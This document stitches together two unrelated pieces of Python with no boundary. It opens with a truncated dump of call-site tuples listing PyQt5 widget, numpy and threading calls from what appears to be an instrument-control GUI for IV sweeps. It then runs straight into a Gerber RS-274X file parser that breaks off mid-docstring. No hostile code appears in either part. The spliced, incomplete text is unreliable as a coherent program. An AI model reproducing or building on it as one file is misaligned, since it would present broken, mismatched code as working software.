QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((6046, 6054), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (6052, 6054), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((6074, 6082), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (6080, 6082), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((6778, 6794), 'PyQt5.QtWidgets.QStackedWidget', 'QStackedWidget', ([], {}), '()\n', (6792, 6794), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, 
QSizePolicy\n'), ((7012, 7046), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Trace Description</b>"""'], {}), "('<b>Trace Description</b>')\n", (7018, 7046), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7846, 7855), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7853, 7855), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7884, 7897), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (7895, 7897), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((7963, 8000), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Configure Parameters</b>"""'], {}), "('<b>Configure Parameters</b>')\n", (7969, 8000), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8027, 8038), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (8036, 8038), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8636, 8645), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (8643, 8645), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8673, 8686), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), 
'()\n', (8684, 8686), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8739, 8775), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>IV-sweep Parameters</b>"""'], {}), "('<b>IV-sweep Parameters</b>')\n", (8745, 8775), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((8913, 8936), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Select Device"""'], {}), "('Select Device')\n", (8919, 8936), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9162, 9182), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Sweep Type"""'], {}), "('Sweep Type')\n", (9168, 9182), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9202, 9213), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (9211, 9213), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9564, 9580), 'PyQt5.QtWidgets.QStackedWidget', 'QStackedWidget', ([], {}), '()\n', (9578, 9580), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9765, 9790), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Hysteresis Mode"""'], {}), "('Hysteresis Mode')\n", (9771, 9790), False, 'from 
PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((9811, 9822), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (9820, 9822), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10605, 10614), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (10612, 10614), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10641, 10654), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (10652, 10654), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10704, 10738), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>V-step Parameters</b>"""'], {}), "('<b>V-step Parameters</b>')\n", (10710, 10738), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10804, 10827), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Select Device"""'], {}), "('Select Device')\n", (10810, 10827), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((10965, 10984), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Step Type"""'], {}), "('Step Type')\n", (10971, 10984), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, 
QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11003, 11014), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (11012, 11014), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11372, 11388), 'PyQt5.QtWidgets.QStackedWidget', 'QStackedWidget', ([], {}), '()\n', (11386, 11388), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11573, 11588), 'PyQt5.QtCore.QStateMachine', 'QStateMachine', ([], {}), '()\n', (11586, 11588), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((11610, 11623), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (11621, 11623), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((11818, 11826), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (11824, 11826), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((11845, 11853), 'PyQt5.QtCore.QState', 'QState', ([], {}), '()\n', (11851, 11853), False, 'from PyQt5.QtCore import Qt, QStateMachine, QState, QObject\n'), ((13091, 13100), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (13098, 13100), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13127, 13140), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (13138, 13140), False, 'from PyQt5.QtWidgets import QApplication, QWidget, 
QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13207, 13240), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Configure x-axis</b>"""'], {}), "('<b>Configure x-axis</b>')\n", (13213, 13240), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13400, 13411), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (13409, 13411), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13640, 13673), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""<b>Configure y-axis</b>"""'], {}), "('<b>Configure y-axis</b>')\n", (13646, 13673), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((13833, 13844), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (13842, 13844), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((14632, 14641), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (14639, 14641), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((14672, 14685), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (14683, 14685), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, 
QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((14931, 14999), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_start_config'], {}), '(self.voltage_sweep_start_config)\n', (14966, 14999), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((15240, 15307), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_stop_config'], {}), '(self.voltage_sweep_stop_config)\n', (15275, 15307), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((15559, 15626), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_cmpl_config'], {}), '(self.voltage_sweep_cmpl_config)\n', (15594, 15626), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((15839, 15906), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_npts_config'], {}), '(self.voltage_sweep_npts_config)\n', (15874, 15906), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((16136, 16204), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_sweep_delay_config'], {}), '(self.voltage_sweep_delay_config)\n', (16171, 16204), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((16793, 16802), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (16800, 16802), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((16833, 16846), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (16844, 16846), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, 
QStackedWidget, QSizePolicy\n'), ((17092, 17160), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_start_config'], {}), '(self.current_sweep_start_config)\n', (17127, 17160), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((17401, 17468), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_stop_config'], {}), '(self.current_sweep_stop_config)\n', (17436, 17468), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((17717, 17784), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_cmpl_config'], {}), '(self.current_sweep_cmpl_config)\n', (17752, 17784), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((17996, 18063), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_npts_config'], {}), '(self.current_sweep_npts_config)\n', (18031, 18063), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((18291, 18359), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_delay_config'], {}), '(self.current_sweep_delay_config)\n', (18326, 18359), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((18946, 18955), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (18953, 18955), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((18985, 18998), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (18996, 18998), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((19239, 
19306), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_start_config'], {}), '(self.voltage_step_start_config)\n', (19274, 19306), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((19543, 19609), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_stop_config'], {}), '(self.voltage_step_stop_config)\n', (19578, 19609), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((19864, 19930), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_cmpl_config'], {}), '(self.voltage_step_cmpl_config)\n', (19899, 19930), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((20146, 20212), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_npts_config'], {}), '(self.voltage_step_npts_config)\n', (20181, 20212), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((20721, 20730), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (20728, 20730), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((20760, 20773), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (20771, 20773), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((21014, 21081), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_start_config'], {}), '(self.current_step_start_config)\n', (21049, 21081), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((21318, 21384), 
'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_stop_config'], {}), '(self.current_step_stop_config)\n', (21353, 21384), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((21638, 21704), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_cmpl_config'], {}), '(self.current_step_cmpl_config)\n', (21673, 21704), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((21919, 21985), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_npts_config'], {}), '(self.current_step_npts_config)\n', (21954, 21985), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((22554, 22593), 'PyQtVisa.widgets.QVisaDynamicPlot.QVisaDynamicPlot', 'QVisaDynamicPlot.QVisaDynamicPlot', (['self'], {}), '(self)\n', (22587, 22593), False, 'from PyQtVisa.widgets import QVisaDynamicPlot\n'), ((30091, 30102), 'time.time', 'time.time', ([], {}), '()\n', (30100, 30102), False, 'import time\n'), ((36810, 36821), 'time.time', 'time.time', ([], {}), '()\n', (36819, 36821), False, 'import time\n'), ((3549, 3581), 'numpy.concatenate', 'np.concatenate', (['(sp, sp[-2::-1])'], {}), '((sp, sp[-2::-1]))\n', (3563, 3581), True, 'import numpy as np\n'), ((3846, 3874), 'numpy.where', 'np.where', (['(sp > 0)', 'sp', 'np.nan'], {}), '(sp > 0, sp, np.nan)\n', (3854, 3874), True, 'import numpy as np\n'), ((3944, 3972), 'numpy.where', 'np.where', (['(sp < 0)', 'sp', 'np.nan'], {}), '(sp < 0, sp, np.nan)\n', (3952, 3972), True, 'import numpy as np\n'), ((28147, 28160), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ([], {}), '()\n', (28158, 28160), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((4159, 4234), 'numpy.concatenate', 
'np.concatenate', (['([0.0], pos, pos[-2::-1], [0.0], neg[::-1], neg[1:], [0.0])'], {}), '(([0.0], pos, pos[-2::-1], [0.0], neg[::-1], neg[1:], [0.0]))\n', (4173, 4234), True, 'import numpy as np\n'), ((28645, 28658), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ([], {}), '()\n', (28656, 28658), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((40793, 40854), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.exec_sweep_step_thread', 'args': '()'}), '(target=self.exec_sweep_step_thread, args=())\n', (40809, 40854), False, 'import threading\n'), ((40884, 40940), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.exec_sweep_thread', 'args': '()'}), '(target=self.exec_sweep_thread, args=())\n', (40900, 40940), False, 'import threading\n'), ((3891, 3904), 'numpy.isnan', 'np.isnan', (['pos'], {}), '(pos)\n', (3899, 3904), True, 'import numpy as np\n'), ((3988, 4001), 'numpy.isnan', 'np.isnan', (['neg'], {}), '(neg)\n', (3996, 4001), True, 'import numpy as np\n'), ((4342, 4417), 'numpy.concatenate', 'np.concatenate', (['([0.0], neg, neg[-2::-1], [0.0], pos[::-1], pos[1:], [0.0])'], {}), '(([0.0], neg, neg[-2::-1], [0.0], pos[::-1], pos[1:], [0.0]))\n', (4356, 4417), True, 'import numpy as np\n'), ((4519, 4551), 'numpy.concatenate', 'np.concatenate', (['(sp, sp[-2::-1])'], {}), '((sp, sp[-2::-1]))\n', (4533, 4551), True, 'import numpy as np\n'), ((32926, 32953), 'time.sleep', 'time.sleep', (['__sweep_delay__'], {}), '(__sweep_delay__)\n', (32936, 32953), False, 'import time\n'), ((38230, 38257), 'time.sleep', 'time.sleep', (['__sweep_delay__'], {}), '(__sweep_delay__)\n', (38240, 38257), False, 'import time\n'), ((4996, 5022), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (5012, 5022), False, 'import os\n'), ((38307, 38318), 'time.time', 'time.time', ([], {}), 
'()\n', (38316, 38318), False, 'import time\n'), ((33985, 34012), 'time.sleep', 'time.sleep', (['__sweep_delay__'], {}), '(__sweep_delay__)\n', (33995, 34012), False, 'import time\n'), ((34066, 34077), 'time.time', 'time.time', ([], {}), '()\n', (34075, 34077), False, 'import time\n')] |
#!/usr/bin/python3
# RS-274X per standard Revision 2021.02
import re
import copy
import numpy as np
import vertices
# TODO replace all vertices with outline class
# Meant for extracting substrings only
# Cast to int or float will catch invalid strings
RE_INT = r'[+-]?[0-9]+'  # optionally signed integer field
RE_DEC = r'[+-]?[0-9\.]+?'  # optionally signed decimal field (non-greedy)
# Exposure flag values used by aperture-macro primitives
EXPOSURE_ON = 1
EXPOSURE_OFF = 0
class Gerber():
    def __init__(self):
        """Create an empty parser; state is filled in by parse()."""
        # Coordinate format digits, set exactly once by the FS statement
        self.format_num_int = None
        self.format_num_dec = None
        # 'mm' or 'in', set by the MO statement
        self.unit = None
        # Most recent operation point (raw integer coordinates)
        self.current_point = None
        # Key into self.apertures selected by the last Dnn statement
        self.current_aperture = None
        # Interpolation should be None, but not all files have G01
        self.interpolation = 'linear'
        # Region being built between G36/G37, else None
        self.region = None
        self.transform = ApertureTransform()
        self.apertures = {}
        # Standard aperture templates keyed by template code
        self.templates = {
            'C': Circle(1.0),
            'R': Rectangle(1.0, 1.0),
            'O': Obround(1.0, 1.0),
            'P': Polygon(1.0, 3, 0.0)
        }
        self.objects = []
        # Stack of object lists; regions/aperture blocks push their own list
        self.objects_list_stack = [self.objects]
        self.reached_eof = False
def add_object(self, new_obj):
self.objects_list_stack[-1].append(new_obj)
    def comment(self, statement: str):
        """G04: comments have no graphical meaning; discard."""
        pass
    def ignore(self, statement: str):
        """Handler for commands that are recognized but deliberately skipped."""
        pass
def not_implemented(self, statement: str):
raise NotImplementedError('Command not implemented: ' + statement)
def begin_region(self, statement: str):
# TODO is self.region required?
self.region = Region(self.transform)
self.objects_list_stack.append(self.region)
def end_region(self, statement: str):
self.region.end_contour()
self.objects_list_stack.pop()
self.add_object(self.region)
self.region = None
    def get_command_function(self, statement: str):
        """Return the bound handler method for a single statement.

        Extended commands (delimited by '%') dispatch on the two
        characters after the '%'; word commands dispatch on their
        G/D/M code, with D10 and above collapsed onto the aperture
        select entry 'Dnn'. Raises KeyError for unknown statements.
        """
        commands = {
            'G04': self.comment,
            'MO': self.set_mode,
            'FS': self.set_format,
            'AD': self.aperture_define,
            'AM': self.aperture_macro,
            'Dnn': self.set_current_aperture,
            'D01': self.interpolate_operation,
            'D02': self.move_operation,
            'D03': self.flash_operation,
            'G01': self.set_interpolation,
            'G02': self.set_interpolation,
            'G03': self.set_interpolation,
            'G74': self.not_implemented,
            'G75': self.ignore,
            'LP': self.load_polarity,
            'LM': self.load_mirroring,
            'LR': self.load_rotation,
            'LS': self.load_scaling,
            'G36': self.begin_region,
            'G37': self.end_region,
            'AB': self.aperture_block,
            'SR': self.step_and_repeat,
            'TF': self.ignore,
            'TA': self.ignore,
            'TO': self.ignore,
            'TD': self.ignore,
            'M02': self.set_eof
        }
        # Extended commands
        # e.g.
        # %MOMM*%
        # %AMDonut*
        # 1,1,$1,$2,$3*
        # $4=$1x0.75*
        # 1,0,$4,$2,$3*
        # %
        # %ADD11Donut,0.30X0X0*%
        code = None
        if statement.startswith('%'):
            code = statement[1:3]
        else:
            # Word commands
            # e.g.
            # G04 comment *
            # D10*
            # X0Y0D02*
            match = re.search(r'[GDM](\d\d)', statement)
            if match:
                code = match.group()
                # D10 and above select an aperture rather than operate
                if code[0] == 'D' and int(match.group(1)) >= 10:
                    code = 'Dnn'
        try:
            return commands[code]
        except KeyError:
            raise KeyError(f'Unrecognized statement: {statement}')
def set_eof(self, statement: str):
if statement != 'M02*':
raise ValueError('Invalid EOF statement')
self.reached_eof = True
    def parse(self, filename: str):
        """Parse a Gerber file, dispatching each statement to its handler.

        Extended commands are delimited by '%' and may span multiple
        lines; word commands are one per line. Raises ValueError (with
        the 1-based line number) for any malformed statement, and when
        the M02 end-of-file marker is missing.
        """
        with open(filename, 'r') as f:
            delimiter = False
            for line_num, line in enumerate(f):
                if line.isspace():
                    continue
                # A leading '%' opens an extended command; accumulate
                # lines until a line ends with the closing '%'
                if line.startswith('%'):
                    delimiter = True
                    statement = ''
                if delimiter:
                    statement += line
                else:
                    statement = line
                if line.endswith('%\n'):
                    delimiter = False
                if not delimiter:
                    # Statement complete: strip and dispatch it
                    statement = statement.strip()
                    try:
                        command = self.get_command_function(statement)
                        command(statement)
                    except (ValueError, KeyError) as ex:
                        raise ValueError(f'Error line {line_num + 1}: {ex}')
        if not self.reached_eof:
            raise ValueError('File did not contain EOF marker')
def set_mode(self, statement: str):
# Set unit of measurement to metric or imperial
if statement == '%MOMM*%':
self.unit = 'mm'
elif statement == '%MOIN*%':
self.unit = 'in'
else:
raise ValueError(f'Unrecognized mode statement: {statement}')
def set_format(self, statement: str):
# Set coordinates and distances in operations
# %FSLAX36Y36*% sets 3 integer digits, 6 decimal digits
# 6 decimal digits implies 10^-6 is increment
if self.format_num_dec is not None or self.format_num_int is not None:
raise ValueError('Format must be set exactly once')
match = re.search(r'%FSLAX([1-6])([3-6])Y([1-6])([3-6])\*%', statement)
if match is None:
raise ValueError(f'Unrecognized format statement: {statement}')
if match.group(1) != match.group(3):
raise ValueError(f'Mismatched format X, Y integer digits: {statement}')
if match.group(2) != match.group(4):
raise ValueError(f'Mismatched format X, Y decimal digits: {statement}')
self.format_num_int = int(match.group(1))
self.format_num_dec = int(match.group(2))
self.format_scale = 10**(-self.format_num_dec)
def set_interpolation(self, statement: str):
    """Set the interpolation state from a G01/G02/G03 statement.

    G01 selects linear, G02 clockwise circular, G03 counterclockwise
    circular interpolation.

    Raises:
        ValueError: If the statement is not one of the three codes.
    """
    modes = {
        'G01*': 'linear',
        'G02*': 'cw_circular',
        'G03*': 'ccw_circular',
    }
    if statement not in modes:
        raise ValueError(f'Unrecognized interpolation statement: {statement}')
    self.interpolation = modes[statement]
def create_aperture(self):
    """Return a clone of the currently selected aperture, or None if unset."""
    if self.current_aperture is None:
        return None
    return self.apertures[self.current_aperture].clone()
def get_new_point(self, x: str, y: str):
    """Resolve coordinate tokens (e.g. 'X2152000', 'Y1215000') to a point.

    A missing/empty axis token keeps the corresponding coordinate of the
